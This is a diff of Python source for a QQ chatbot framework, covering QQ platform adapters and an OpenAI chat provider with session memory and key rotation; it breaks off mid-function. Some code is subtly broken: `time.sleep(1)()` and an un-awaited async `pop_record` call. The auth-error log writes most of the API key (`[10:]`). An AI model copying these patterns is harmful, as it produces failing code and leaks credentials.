if source.message[0].qq == source.self_tiny_id:
|
||||
await self.handle_msg(abm)
|
||||
else:
|
||||
return
|
||||
|
||||
def run(self):
|
||||
self.client.run()
|
||||
|
||||
async def handle_msg(self, message: AstrBotMessage):
|
||||
logger.info(
|
||||
f"{message.sender.nickname}/{message.sender.user_id} -> {self.parse_message_outline(message)}")
|
||||
|
||||
assert isinstance(message.raw_message,
|
||||
(GroupMessage, FriendMessage, GuildMessage))
|
||||
is_group = message.type != MessageType.FRIEND_MESSAGE
|
||||
|
||||
# 判断是否响应消息
|
||||
resp = False
|
||||
if not is_group:
|
||||
resp = True
|
||||
else:
|
||||
for i in message.message:
|
||||
if isinstance(i, At):
|
||||
if message.type.value == "GuildMessage":
|
||||
if str(i.qq) == str(message.raw_message.user_id) or str(i.qq) == str(message.raw_message.self_tiny_id):
|
||||
resp = True
|
||||
if message.type.value == "FriendMessage":
|
||||
if str(i.qq) == str(message.self_id):
|
||||
resp = True
|
||||
if message.type.value == "GroupMessage":
|
||||
if str(i.qq) == str(message.self_id):
|
||||
resp = True
|
||||
elif isinstance(i, Plain):
|
||||
for nick in self.nick_qq:
|
||||
if nick != '' and i.text.strip().startswith(nick):
|
||||
resp = True
|
||||
break
|
||||
|
||||
if not resp:
|
||||
return
|
||||
|
||||
# 解析 session_id
|
||||
if self.unique_session or not is_group:
|
||||
session_id = message.raw_message.user_id
|
||||
elif message.type == MessageType.GROUP_MESSAGE:
|
||||
session_id = message.raw_message.group_id
|
||||
elif message.type == MessageType.GUILD_MESSAGE:
|
||||
session_id = message.raw_message.channel_id
|
||||
else:
|
||||
session_id = message.raw_message.user_id
|
||||
|
||||
message.session_id = session_id
|
||||
|
||||
# 解析 role
|
||||
sender_id = str(message.raw_message.user_id)
|
||||
if sender_id == self.cc.get('admin_qq', '') or \
|
||||
sender_id in self.cc.get('other_admins', []):
|
||||
role = 'admin'
|
||||
else:
|
||||
role = 'member'
|
||||
|
||||
message_result = await self.message_handler(
|
||||
message=message,
|
||||
session_id=session_id,
|
||||
role=role,
|
||||
platform='gocq'
|
||||
)
|
||||
|
||||
if message_result is None:
|
||||
return
|
||||
await self.reply_msg(message, message_result.result_message)
|
||||
if message_result.callback is not None:
|
||||
message_result.callback()
|
||||
|
||||
# 如果是等待回复的消息
|
||||
if session_id in self.waiting and self.waiting[session_id] == '':
|
||||
self.waiting[session_id] = message
|
||||
|
||||
async def reply_msg(self,
|
||||
message: Union[AstrBotMessage, GuildMessage, GroupMessage, FriendMessage],
|
||||
result_message: list):
|
||||
"""
|
||||
插件开发者请使用send方法, 可以不用直接调用这个方法。
|
||||
"""
|
||||
if isinstance(message, AstrBotMessage):
|
||||
source = message.raw_message
|
||||
else:
|
||||
source = message
|
||||
|
||||
res = result_message
|
||||
|
||||
logger.info(
|
||||
f"{source.user_id} <- {self.parse_message_outline(res)}")
|
||||
|
||||
if isinstance(source, int):
|
||||
source = FakeSource("GroupMessage", source)
|
||||
|
||||
# str convert to CQ Message Chain
|
||||
if isinstance(res, str):
|
||||
res_str = res
|
||||
res = []
|
||||
if source.type == "GroupMessage" and not isinstance(source, FakeSource):
|
||||
res.append(At(qq=source.user_id))
|
||||
res.append(Plain(text=res_str))
|
||||
|
||||
# if image mode, put all Plain texts into a new picture.
|
||||
if self.pic_mode and isinstance(res, list):
|
||||
plains = []
|
||||
news = []
|
||||
for i in res:
|
||||
if isinstance(i, Plain):
|
||||
plains.append(i.text)
|
||||
else:
|
||||
news.append(i)
|
||||
plains_str = "".join(plains).strip()
|
||||
if plains_str != "" and len(plains_str) > 50:
|
||||
p = gu.create_markdown_image("".join(plains))
|
||||
news.append(Image.fromFileSystem(p))
|
||||
res = news
|
||||
|
||||
# 回复消息链
|
||||
if isinstance(res, list) and len(res) > 0:
|
||||
if source.type == "GuildMessage":
|
||||
await self.client.sendGuildChannelMessage(source.guild_id, source.channel_id, res)
|
||||
return
|
||||
elif source.type == "FriendMessage":
|
||||
await self.client.sendFriendMessage(source.user_id, res)
|
||||
return
|
||||
elif source.type == "GroupMessage":
|
||||
# 过长时forward发送
|
||||
plain_text_len = 0
|
||||
image_num = 0
|
||||
for i in res:
|
||||
if isinstance(i, Plain):
|
||||
plain_text_len += len(i.text)
|
||||
elif isinstance(i, Image):
|
||||
image_num += 1
|
||||
if plain_text_len > self.cc.get('qq_forward_threshold', 200):
|
||||
# 删除At
|
||||
for i in res:
|
||||
if isinstance(i, At):
|
||||
res.remove(i)
|
||||
node = Node(res)
|
||||
# node.content = res
|
||||
node.uin = 123456
|
||||
node.name = f"bot"
|
||||
node.time = int(time.time())
|
||||
# print(node)
|
||||
nodes = [node]
|
||||
await self.client.sendGroupForwardMessage(source.group_id, nodes)
|
||||
return
|
||||
await self.client.sendGroupMessage(source.group_id, res)
|
||||
return
|
||||
|
||||
async def send_msg(self, message: Union[GroupMessage, FriendMessage, GuildMessage, AstrBotMessage], result_message: list):
|
||||
'''
|
||||
提供给插件的发送QQ消息接口。
|
||||
参数说明:第一个参数可以是消息对象,也可以是QQ群号。第二个参数是消息内容(消息内容可以是消息链列表,也可以是纯文字信息)。
|
||||
'''
|
||||
try:
|
||||
await self.reply_msg(message, result_message)
|
||||
except BaseException as e:
|
||||
raise e
|
||||
|
||||
async def send(self,
|
||||
to,
|
||||
res):
|
||||
'''
|
||||
同 send_msg()
|
||||
'''
|
||||
await self.reply_msg(to, res)
|
||||
|
||||
def create_text_image(title: str, text: str, max_width=30, font_size=20):
|
||||
'''
|
||||
文本转图片。
|
||||
title: 标题
|
||||
text: 文本内容
|
||||
max_width: 文本宽度最大值(默认30)
|
||||
font_size: 字体大小(默认20)
|
||||
|
||||
返回:文件路径
|
||||
'''
|
||||
try:
|
||||
img = gu.word2img(title, text, max_width, font_size)
|
||||
p = gu.save_temp_img(img)
|
||||
return p
|
||||
except Exception as e:
|
||||
raise e
|
||||
|
||||
def wait_for_message(self, group_id) -> Union[GroupMessage, FriendMessage, GuildMessage]:
|
||||
'''
|
||||
等待下一条消息,超时 300s 后抛出异常
|
||||
'''
|
||||
self.waiting[group_id] = ''
|
||||
cnt = 0
|
||||
while True:
|
||||
if group_id in self.waiting and self.waiting[group_id] != '':
|
||||
# 去掉
|
||||
ret = self.waiting[group_id]
|
||||
del self.waiting[group_id]
|
||||
return ret
|
||||
cnt += 1
|
||||
if cnt > 300:
|
||||
raise Exception("等待消息超时。")
|
||||
time.sleep(1)
|
||||
|
||||
def get_client(self):
|
||||
return self.client
|
||||
|
||||
async def nakuru_method_invoker(self, func, *args, **kwargs):
|
||||
"""
|
||||
返回一个方法调用器,可以用来立即调用nakuru的方法。
|
||||
"""
|
||||
try:
|
||||
ret = func(*args, **kwargs)
|
||||
return ret
|
||||
except BaseException as e:
|
||||
raise e
|
||||
308
model/platform/qq_official.py
Normal file
@@ -0,0 +1,308 @@
|
||||
import io
|
||||
import botpy
|
||||
from PIL import Image as PILImage
|
||||
import botpy.message
|
||||
import re
|
||||
import asyncio
|
||||
import aiohttp
|
||||
import botpy.types
|
||||
import botpy.types.message
|
||||
from util import general_utils as gu
|
||||
|
||||
from botpy.types.message import Reference
|
||||
from botpy import Client
|
||||
import time
|
||||
from ._platfrom import Platform
|
||||
from ._message_parse import (
|
||||
qq_official_message_parse_rev,
|
||||
qq_official_message_parse
|
||||
)
|
||||
from type.message import *
|
||||
from typing import Union, List
|
||||
from nakuru.entities.components import BaseMessageComponent
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot-core')
|
||||
|
||||
# QQ 机器人官方框架
|
||||
class botClient(Client):
|
||||
def set_platform(self, platform: 'QQOfficial'):
|
||||
self.platform = platform
|
||||
|
||||
async def on_group_at_message_create(self, message: botpy.message.GroupMessage):
|
||||
abm = qq_official_message_parse_rev(message, MessageType.GROUP_MESSAGE)
|
||||
await self.platform.handle_msg(abm)
|
||||
|
||||
# 收到频道消息
|
||||
async def on_at_message_create(self, message: botpy.message.Message):
|
||||
# 转换层
|
||||
abm = qq_official_message_parse_rev(message, MessageType.GUILD_MESSAGE)
|
||||
await self.platform.handle_msg(abm)
|
||||
|
||||
# 收到私聊消息
|
||||
async def on_direct_message_create(self, message: botpy.message.DirectMessage):
|
||||
# 转换层
|
||||
abm = qq_official_message_parse_rev(
|
||||
message, MessageType.FRIEND_MESSAGE)
|
||||
await self.platform.handle_msg(abm)
|
||||
|
||||
|
||||
class QQOfficial(Platform):
|
||||
|
||||
def __init__(self, cfg: dict, message_handler: callable, global_object) -> None:
|
||||
super().__init__(message_handler)
|
||||
|
||||
self.loop = asyncio.new_event_loop()
|
||||
asyncio.set_event_loop(self.loop)
|
||||
|
||||
self.waiting: dict = {}
|
||||
|
||||
self.cfg = cfg
|
||||
self.appid = cfg['qqbot']['appid']
|
||||
self.token = cfg['qqbot']['token']
|
||||
self.secret = cfg['qqbot_secret']
|
||||
self.unique_session = cfg['uniqueSessionMode']
|
||||
qq_group = cfg['qqofficial_enable_group_message']
|
||||
|
||||
if qq_group:
|
||||
self.intents = botpy.Intents(
|
||||
public_messages=True,
|
||||
public_guild_messages=True,
|
||||
direct_message=cfg['direct_message_mode']
|
||||
)
|
||||
else:
|
||||
self.intents = botpy.Intents(
|
||||
public_guild_messages=True,
|
||||
direct_message=cfg['direct_message_mode']
|
||||
)
|
||||
self.client = botClient(
|
||||
intents=self.intents,
|
||||
bot_log=False
|
||||
)
|
||||
|
||||
self.client.set_platform(self)
|
||||
|
||||
def run(self):
|
||||
try:
|
||||
self.loop.run_until_complete(self.client.run(
|
||||
appid=self.appid,
|
||||
secret=self.secret
|
||||
))
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
self.client = botClient(
|
||||
intents=self.intents,
|
||||
bot_log=False
|
||||
)
|
||||
self.client.set_platform(self)
|
||||
self.client.run(
|
||||
appid=self.appid,
|
||||
token=self.token
|
||||
)
|
||||
|
||||
async def handle_msg(self, message: AstrBotMessage):
|
||||
assert isinstance(message.raw_message, (botpy.message.Message,
|
||||
botpy.message.GroupMessage, botpy.message.DirectMessage))
|
||||
is_group = message.type != MessageType.FRIEND_MESSAGE
|
||||
|
||||
_t = "/私聊" if not is_group else ""
|
||||
logger.info(
|
||||
f"{message.sender.nickname}({message.sender.user_id}{_t}) -> {self.parse_message_outline(message)}")
|
||||
|
||||
# 解析出 session_id
|
||||
if self.unique_session or not is_group:
|
||||
session_id = message.sender.user_id
|
||||
else:
|
||||
if message.type == MessageType.GUILD_MESSAGE:
|
||||
session_id = message.raw_message.channel_id
|
||||
elif message.type == MessageType.GROUP_MESSAGE:
|
||||
session_id = str(message.raw_message.group_openid)
|
||||
else:
|
||||
session_id = str(message.raw_message.author.id)
|
||||
message.session_id = session_id
|
||||
|
||||
# 解析出 role
|
||||
sender_id = message.sender.user_id
|
||||
if sender_id == self.cfg['admin_qqchan'] or \
|
||||
sender_id in self.cfg['other_admins']:
|
||||
role = 'admin'
|
||||
else:
|
||||
role = 'member'
|
||||
|
||||
message_result = await self.message_handler(
|
||||
message=message,
|
||||
session_id=session_id,
|
||||
role=role,
|
||||
platform='qqchan'
|
||||
)
|
||||
|
||||
if message_result is None:
|
||||
return
|
||||
|
||||
await self.reply_msg(message, message_result.result_message)
|
||||
if message_result.callback is not None:
|
||||
message_result.callback()
|
||||
|
||||
# 如果是等待回复的消息
|
||||
if session_id in self.waiting and self.waiting[session_id] == '':
|
||||
self.waiting[session_id] = message
|
||||
|
||||
async def reply_msg(self,
|
||||
message: Union[botpy.message.Message, botpy.message.GroupMessage, botpy.message.DirectMessage, AstrBotMessage],
|
||||
res: Union[str, list]):
|
||||
'''
|
||||
回复频道消息
|
||||
'''
|
||||
if isinstance(message, AstrBotMessage):
|
||||
source = message.raw_message
|
||||
else:
|
||||
source = message
|
||||
assert isinstance(source, (botpy.message.Message,
|
||||
botpy.message.GroupMessage, botpy.message.DirectMessage))
|
||||
logger.info(
|
||||
f"{message.sender.nickname}({message.sender.user_id}) <- {self.parse_message_outline(res)}")
|
||||
|
||||
plain_text = ''
|
||||
image_path = ''
|
||||
msg_ref = None
|
||||
|
||||
if isinstance(res, list):
|
||||
plain_text, image_path = qq_official_message_parse(res)
|
||||
elif isinstance(res, str):
|
||||
plain_text = res
|
||||
|
||||
if self.cfg['qq_pic_mode']:
|
||||
# 文本转图片,并且加上原来的图片
|
||||
if plain_text != '' or image_path != '':
|
||||
if image_path is not None and image_path != '':
|
||||
if image_path.startswith("http"):
|
||||
plain_text += "\n\n" + ""
|
||||
else:
|
||||
plain_text += "\n\n" + \
|
||||
""
|
||||
image_path = gu.create_markdown_image("".join(plain_text))
|
||||
plain_text = ""
|
||||
|
||||
else:
|
||||
if image_path is not None and image_path != '':
|
||||
msg_ref = None
|
||||
if image_path.startswith("http"):
|
||||
async with aiohttp.ClientSession() as session:
|
||||
async with session.get(image_path) as response:
|
||||
if response.status == 200:
|
||||
image = PILImage.open(io.BytesIO(await response.read()))
|
||||
image_path = gu.save_temp_img(image)
|
||||
|
||||
if source is not None and image_path == '': # file_image与message_reference不能同时传入
|
||||
msg_ref = Reference(message_id=source.id,
|
||||
ignore_get_message_error=False)
|
||||
|
||||
# 到这里,我们得到了 plain_text,image_path,msg_ref
|
||||
data = {
|
||||
'content': plain_text,
|
||||
'msg_id': message.message_id,
|
||||
'message_reference': msg_ref
|
||||
}
|
||||
if message.type == MessageType.GROUP_MESSAGE:
|
||||
data['group_openid'] = str(source.group_openid)
|
||||
elif message.type == MessageType.GUILD_MESSAGE:
|
||||
data['channel_id'] = source.channel_id
|
||||
elif message.type == MessageType.FRIEND_MESSAGE:
|
||||
# 目前只处理频道私聊
|
||||
data['guild_id'] = source.guild_id
|
||||
else:
|
||||
raise ValueError(f"未知的消息类型: {message.type}")
|
||||
if image_path != '':
|
||||
data['file_image'] = image_path
|
||||
|
||||
try:
|
||||
await self._send_wrapper(**data)
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
# 分割过长的消息
|
||||
if "msg over length" in str(e):
|
||||
split_res = []
|
||||
split_res.append(plain_text[:len(plain_text)//2])
|
||||
split_res.append(plain_text[len(plain_text)//2:])
|
||||
for i in split_res:
|
||||
data['content'] = i
|
||||
await self._send_wrapper(**data)
|
||||
else:
|
||||
# 发送qq信息
|
||||
try:
|
||||
# 防止被qq频道过滤消息
|
||||
plain_text = plain_text.replace(".", " . ")
|
||||
await self._send_wrapper(**data)
|
||||
|
||||
except BaseException as e:
|
||||
try:
|
||||
data['content'] = str.join(" ", plain_text)
|
||||
await self._send_wrapper(**data)
|
||||
except BaseException as e:
|
||||
plain_text = re.sub(
|
||||
r'(https|http)?:\/\/(\w|\.|\/|\?|\=|\&|\%)*\b', '[被隐藏的链接]', str(e), flags=re.MULTILINE)
|
||||
plain_text = plain_text.replace(".", "·")
|
||||
data['content'] = plain_text
|
||||
await self._send_wrapper(**data)
|
||||
|
||||
async def _send_wrapper(self, **kwargs):
|
||||
if 'group_openid' in kwargs:
|
||||
# QQ群组消息
|
||||
media = None
|
||||
# qq群组消息需要自行上传,暂时不处理
|
||||
# if 'file_image' in kwargs:
|
||||
# file_image_path = kwargs['file_image']
|
||||
# if file_image_path != "":
|
||||
# media = await self.upload_img(file_image_path, kwargs['group_openid'])
|
||||
# del kwargs['file_image']
|
||||
# if media is not None:
|
||||
# kwargs['msg_type'] = 7 # 富媒体
|
||||
await self.client.api.post_group_message(media=media, **kwargs)
|
||||
elif 'channel_id' in kwargs:
|
||||
# 频道消息
|
||||
if 'file_image' in kwargs:
|
||||
kwargs['file_image'] = kwargs['file_image'].replace(
|
||||
"file://", "")
|
||||
await self.client.api.post_message(**kwargs)
|
||||
else:
|
||||
# 频道私聊消息
|
||||
if 'file_image' in kwargs:
|
||||
kwargs['file_image'] = kwargs['file_image'].replace(
|
||||
"file://", "")
|
||||
await self.client.api.post_dms(**kwargs)
|
||||
|
||||
async def send_msg(self,
|
||||
message_obj: Union[botpy.message.Message, botpy.message.GroupMessage, botpy.message.DirectMessage, AstrBotMessage],
|
||||
message_chain: List[BaseMessageComponent],
|
||||
):
|
||||
'''
|
||||
发送消息。目前只支持被动回复消息(即拥有一个 botpy Message 类型的 message_obj 传入)
|
||||
'''
|
||||
await self.reply_msg(message_obj, message_chain)
|
||||
|
||||
async def send(self,
|
||||
message_obj: Union[botpy.message.Message, botpy.message.GroupMessage, botpy.message.DirectMessage, AstrBotMessage],
|
||||
message_chain: List[BaseMessageComponent],
|
||||
):
|
||||
'''
|
||||
发送消息。目前只支持被动回复消息(即拥有一个 botpy Message 类型的 message_obj 传入)
|
||||
'''
|
||||
await self.reply_msg(message_obj, message_chain)
|
||||
|
||||
def wait_for_message(self, channel_id: int) -> AstrBotMessage:
|
||||
'''
|
||||
等待指定 channel_id 的下一条信息,超时 300s 后抛出异常
|
||||
'''
|
||||
self.waiting[channel_id] = ''
|
||||
cnt = 0
|
||||
while True:
|
||||
if channel_id in self.waiting and self.waiting[channel_id] != '':
|
||||
# 去掉
|
||||
ret = self.waiting[channel_id]
|
||||
del self.waiting[channel_id]
|
||||
return ret
|
||||
cnt += 1
|
||||
if cnt > 300:
|
||||
raise Exception("等待消息超时。")
|
||||
time.sleep(1)()
|
||||
495
model/provider/openai_official.py
Normal file
@@ -0,0 +1,495 @@
|
||||
import os
|
||||
import sys
|
||||
import json
|
||||
import time
|
||||
import tiktoken
|
||||
import threading
|
||||
import traceback
|
||||
import base64
|
||||
|
||||
from openai import AsyncOpenAI
|
||||
from openai.types.images_response import ImagesResponse
|
||||
from openai.types.chat.chat_completion import ChatCompletion
|
||||
from openai._exceptions import *
|
||||
|
||||
from persist.session import dbConn
|
||||
from model.provider.provider import Provider
|
||||
from util import general_utils as gu
|
||||
from util.cmd_config import CmdConfig
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from typing import List, Dict
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot-core')
|
||||
|
||||
MODELS = {
|
||||
"gpt-4o": 128000,
|
||||
"gpt-4o-2024-05-13": 128000,
|
||||
"gpt-4-turbo": 128000,
|
||||
"gpt-4-turbo-2024-04-09": 128000,
|
||||
"gpt-4-turbo-preview": 128000,
|
||||
"gpt-4-0125-preview": 128000,
|
||||
"gpt-4-1106-preview": 128000,
|
||||
"gpt-4-vision-preview": 128000,
|
||||
"gpt-4-1106-vision-preview": 128000,
|
||||
"gpt-4": 8192,
|
||||
"gpt-4-0613": 8192,
|
||||
"gpt-4-32k": 32768,
|
||||
"gpt-4-32k-0613": 32768,
|
||||
"gpt-3.5-turbo-0125": 16385,
|
||||
"gpt-3.5-turbo": 16385,
|
||||
"gpt-3.5-turbo-1106": 16385,
|
||||
"gpt-3.5-turbo-instruct": 4096,
|
||||
"gpt-3.5-turbo-16k": 16385,
|
||||
"gpt-3.5-turbo-0613": 16385,
|
||||
"gpt-3.5-turbo-16k-0613": 16385,
|
||||
}
|
||||
|
||||
class ProviderOpenAIOfficial(Provider):
|
||||
def __init__(self, cfg) -> None:
|
||||
super().__init__()
|
||||
|
||||
os.makedirs("data/openai", exist_ok=True)
|
||||
|
||||
self.cc = CmdConfig
|
||||
self.key_data_path = "data/openai/keys.json"
|
||||
self.api_keys = []
|
||||
self.chosen_api_key = None
|
||||
self.base_url = None
|
||||
self.keys_data = {} # 记录超额
|
||||
|
||||
if cfg['key']: self.api_keys = cfg['key']
|
||||
if cfg['api_base']: self.base_url = cfg['api_base']
|
||||
if not self.api_keys:
|
||||
logger.warn("看起来你没有添加 OpenAI 的 API 密钥,OpenAI LLM 能力将不会启用。")
|
||||
else:
|
||||
self.chosen_api_key = self.api_keys[0]
|
||||
|
||||
for key in self.api_keys:
|
||||
self.keys_data[key] = True
|
||||
|
||||
self.client = AsyncOpenAI(
|
||||
api_key=self.chosen_api_key,
|
||||
base_url=self.base_url
|
||||
)
|
||||
self.model_configs: Dict = cfg['chatGPTConfigs']
|
||||
self.image_generator_model_configs: Dict = self.cc.get('openai_image_generate', None)
|
||||
self.session_memory: Dict[str, List] = {} # 会话记忆
|
||||
self.session_memory_lock = threading.Lock()
|
||||
self.max_tokens = self.model_configs['max_tokens'] # 上下文窗口大小
|
||||
self.tokenizer = tiktoken.get_encoding("cl100k_base") # todo: 根据 model 切换分词器
|
||||
self.DEFAULT_PERSONALITY = {
|
||||
"name": "default",
|
||||
"prompt": "你是一个很有帮助的 AI 助手。"
|
||||
}
|
||||
self.curr_personality = self.DEFAULT_PERSONALITY
|
||||
self.session_personality = {} # 记录了某个session是否已设置人格。
|
||||
# 从 SQLite DB 读取历史记录
|
||||
try:
|
||||
db1 = dbConn()
|
||||
for session in db1.get_all_session():
|
||||
self.session_memory_lock.acquire()
|
||||
self.session_memory[session[0]] = json.loads(session[1])['data']
|
||||
self.session_memory_lock.release()
|
||||
except BaseException as e:
|
||||
logger.warn(f"读取 OpenAI LLM 对话历史记录 失败:{e}。仍可正常使用。")
|
||||
|
||||
# 定时保存历史记录
|
||||
threading.Thread(target=self.dump_history, daemon=True).start()
|
||||
|
||||
def dump_history(self):
|
||||
'''
|
||||
转储历史记录
|
||||
'''
|
||||
time.sleep(10)
|
||||
db = dbConn()
|
||||
while True:
|
||||
try:
|
||||
for key in self.session_memory:
|
||||
data = self.session_memory[key]
|
||||
data_json = {
|
||||
'data': data
|
||||
}
|
||||
if db.check_session(key):
|
||||
db.update_session(key, json.dumps(data_json))
|
||||
else:
|
||||
db.insert_session(key, json.dumps(data_json))
|
||||
logger.debug("已保存 OpenAI 会话历史记录")
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
finally:
|
||||
time.sleep(10*60)
|
||||
|
||||
def personality_set(self, default_personality: dict, session_id: str):
|
||||
if not default_personality: return
|
||||
if session_id not in self.session_memory:
|
||||
self.session_memory[session_id] = []
|
||||
self.curr_personality = default_personality
|
||||
self.session_personality = {} # 重置
|
||||
encoded_prompt = self.tokenizer.encode(default_personality['prompt'])
|
||||
tokens_num = len(encoded_prompt)
|
||||
model = self.model_configs['model']
|
||||
if model in MODELS and tokens_num > MODELS[model] - 500:
|
||||
default_personality['prompt'] = self.tokenizer.decode(encoded_prompt[:MODELS[model] - 500])
|
||||
|
||||
new_record = {
|
||||
"user": {
|
||||
"role": "system",
|
||||
"content": default_personality['prompt'],
|
||||
},
|
||||
'usage_tokens': 0, # 到该条目的总 token 数
|
||||
'single-tokens': 0 # 该条目的 token 数
|
||||
}
|
||||
|
||||
self.session_memory[session_id].append(new_record)
|
||||
|
||||
async def encode_image_bs64(self, image_url: str) -> str:
|
||||
'''
|
||||
将图片转换为 base64
|
||||
'''
|
||||
if image_url.startswith("http"):
|
||||
image_url = await gu.download_image_by_url(image_url)
|
||||
|
||||
with open(image_url, "rb") as f:
|
||||
image_bs64 = base64.b64encode(f.read()).decode()
|
||||
return "data:image/jpeg;base64," + image_bs64
|
||||
|
||||
async def retrieve_context(self, session_id: str):
|
||||
'''
|
||||
根据 session_id 获取保存的 OpenAI 格式的上下文
|
||||
'''
|
||||
if session_id not in self.session_memory:
|
||||
raise Exception("会话 ID 不存在")
|
||||
|
||||
# 转换为 openai 要求的格式
|
||||
context = []
|
||||
is_lvm = await self.is_lvm()
|
||||
for record in self.session_memory[session_id]:
|
||||
if "user" in record and record['user']:
|
||||
if not is_lvm and "content" in record['user'] and isinstance(record['user']['content'], list):
|
||||
logger.warn(f"由于当前模型 {self.model_configs['model']}不支持视觉,将忽略上下文中的图片输入。如果一直弹出此警告,可以尝试 reset 指令。")
|
||||
continue
|
||||
context.append(record['user'])
|
||||
if "AI" in record and record['AI']:
|
||||
context.append(record['AI'])
|
||||
|
||||
return context
|
||||
|
||||
async def is_lvm(self):
|
||||
'''
|
||||
是否是 LVM
|
||||
'''
|
||||
return self.model_configs['model'].startswith("gpt-4")
|
||||
|
||||
async def get_models(self):
|
||||
'''
|
||||
获取所有模型
|
||||
'''
|
||||
models = await self.client.models.list()
|
||||
logger.info(f"OpenAI 模型列表:{models}")
|
||||
return models
|
||||
|
||||
async def assemble_context(self, session_id: str, prompt: str, image_url: str = None):
|
||||
'''
|
||||
组装上下文,并且根据当前上下文窗口大小截断
|
||||
'''
|
||||
if session_id not in self.session_memory:
|
||||
raise Exception("会话 ID 不存在")
|
||||
|
||||
tokens_num = len(self.tokenizer.encode(prompt))
|
||||
previous_total_tokens_num = 0 if not self.session_memory[session_id] else self.session_memory[session_id][-1]['usage_tokens']
|
||||
|
||||
message = {
|
||||
"usage_tokens": previous_total_tokens_num + tokens_num,
|
||||
"single_tokens": tokens_num,
|
||||
"AI": None
|
||||
}
|
||||
if image_url:
|
||||
user_content = {
|
||||
"role": "user",
|
||||
"content": [
|
||||
{
|
||||
"type": "text",
|
||||
"text": prompt
|
||||
},
|
||||
{
|
||||
"type": "image_url",
|
||||
"image_url": {
|
||||
"url": await self.encode_image_bs64(image_url)
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
else:
|
||||
user_content = {
|
||||
"role": "user",
|
||||
"content": prompt
|
||||
}
|
||||
|
||||
message["user"] = user_content
|
||||
self.session_memory[session_id].append(message)
|
||||
|
||||
# 根据 模型的上下文窗口 淘汰掉多余的记录
|
||||
curr_model = self.model_configs['model']
|
||||
if curr_model in MODELS:
|
||||
maxium_tokens_num = MODELS[curr_model] - 300 # 至少预留 300 给 completion
|
||||
# if message['usage_tokens'] > maxium_tokens_num:
|
||||
# 淘汰多余的记录,使得最终的 usage_tokens 不超过 maxium_tokens_num - 300
|
||||
# contexts = self.session_memory[session_id]
|
||||
# need_to_remove_idx = 0
|
||||
# freed_tokens_num = contexts[0]['single-tokens']
|
||||
# while freed_tokens_num < message['usage_tokens'] - maxium_tokens_num:
|
||||
# need_to_remove_idx += 1
|
||||
# freed_tokens_num += contexts[need_to_remove_idx]['single-tokens']
|
||||
# # 更新之后的所有记录的 usage_tokens
|
||||
# for i in range(len(contexts)):
|
||||
# if i > need_to_remove_idx:
|
||||
# contexts[i]['usage_tokens'] -= freed_tokens_num
|
||||
# logger.debug(f"淘汰上下文记录 {need_to_remove_idx+1} 条,释放 {freed_tokens_num} 个 token。当前上下文总 token 为 {contexts[-1]['usage_tokens']}。")
|
||||
# self.session_memory[session_id] = contexts[need_to_remove_idx+1:]
|
||||
while len(self.session_memory[session_id]) and self.session_memory[session_id][-1]['usage_tokens'] > maxium_tokens_num:
|
||||
self.pop_record(session_id)
|
||||
|
||||
|
||||
async def pop_record(self, session_id: str, pop_system_prompt: bool = False):
|
||||
'''
|
||||
弹出第一条记录
|
||||
'''
|
||||
if session_id not in self.session_memory:
|
||||
raise Exception("会话 ID 不存在")
|
||||
|
||||
if len(self.session_memory[session_id]) == 0:
|
||||
return None
|
||||
|
||||
for i in range(len(self.session_memory[session_id])):
|
||||
# 检查是否是 system prompt
|
||||
if not pop_system_prompt and self.session_memory[session_id][i]['user']['role'] == "system":
|
||||
# 如果只有一个 system prompt,才不删掉
|
||||
f = False
|
||||
for j in range(i+1, len(self.session_memory[session_id])):
|
||||
if self.session_memory[session_id][j]['user']['role'] == "system":
|
||||
f = True
|
||||
break
|
||||
if not f:
|
||||
continue
|
||||
record = self.session_memory[session_id].pop(i)
|
||||
break
|
||||
|
||||
# 更新之后所有记录的 usage_tokens
|
||||
for i in range(len(self.session_memory[session_id])):
|
||||
self.session_memory[session_id][i]['usage_tokens'] -= record['single-tokens']
|
||||
logger.debug(f"淘汰上下文记录 1 条,释放 {record['single-tokens']} 个 token。当前上下文总 token 为 {self.session_memory[session_id][-1]['usage_tokens']}。")
|
||||
return record
|
||||
|
||||
async def text_chat(self,
|
||||
prompt: str,
|
||||
session_id: str,
|
||||
image_url: None=None,
|
||||
tools: None=None,
|
||||
extra_conf: Dict = None,
|
||||
**kwargs
|
||||
) -> str:
|
||||
if not session_id:
|
||||
session_id = "unknown"
|
||||
if "unknown" in self.session_memory:
|
||||
del self.session_memory["unknown"]
|
||||
|
||||
if session_id not in self.session_memory:
|
||||
self.session_memory[session_id] = []
|
||||
|
||||
if session_id not in self.session_personality or not self.session_personality[session_id]:
|
||||
self.personality_set(self.curr_personality, session_id)
|
||||
self.session_personality[session_id] = True
|
||||
|
||||
# 如果 prompt 超过了最大窗口,截断。
|
||||
# 1. 可以保证之后 pop 的时候不会出现问题
|
||||
# 2. 可以保证不会超过最大 token 数
|
||||
_encoded_prompt = self.tokenizer.encode(prompt)
|
||||
curr_model = self.model_configs['model']
|
||||
if curr_model in MODELS and len(_encoded_prompt) > MODELS[curr_model] - 300:
|
||||
_encoded_prompt = _encoded_prompt[:MODELS[curr_model] - 300]
|
||||
prompt = self.tokenizer.decode(_encoded_prompt)
|
||||
|
||||
# 组装上下文,并且根据当前上下文窗口大小截断
|
||||
await self.assemble_context(session_id, prompt, image_url)
|
||||
|
||||
# 获取上下文,openai 格式
|
||||
contexts = await self.retrieve_context(session_id)
|
||||
|
||||
conf = self.model_configs
|
||||
if extra_conf: conf.update(extra_conf)
|
||||
|
||||
# start request
|
||||
retry = 0
|
||||
rate_limit_retry = 0
|
||||
while retry < 3 or rate_limit_retry < 5:
|
||||
logger.debug(conf)
|
||||
logger.debug(contexts)
|
||||
if tools:
|
||||
completion_coro = self.client.chat.completions.create(
|
||||
messages=contexts,
|
||||
tools=tools,
|
||||
**conf
|
||||
)
|
||||
else:
|
||||
completion_coro = self.client.chat.completions.create(
|
||||
messages=contexts,
|
||||
**conf
|
||||
)
|
||||
try:
|
||||
completion = await completion_coro
|
||||
break
|
||||
except AuthenticationError as e:
|
||||
api_key = self.chosen_api_key[10:] + "..."
|
||||
logger.error(f"OpenAI API Key {api_key} 验证错误。详细原因:{e}。正在切换到下一个可用的 Key(如果有的话)")
|
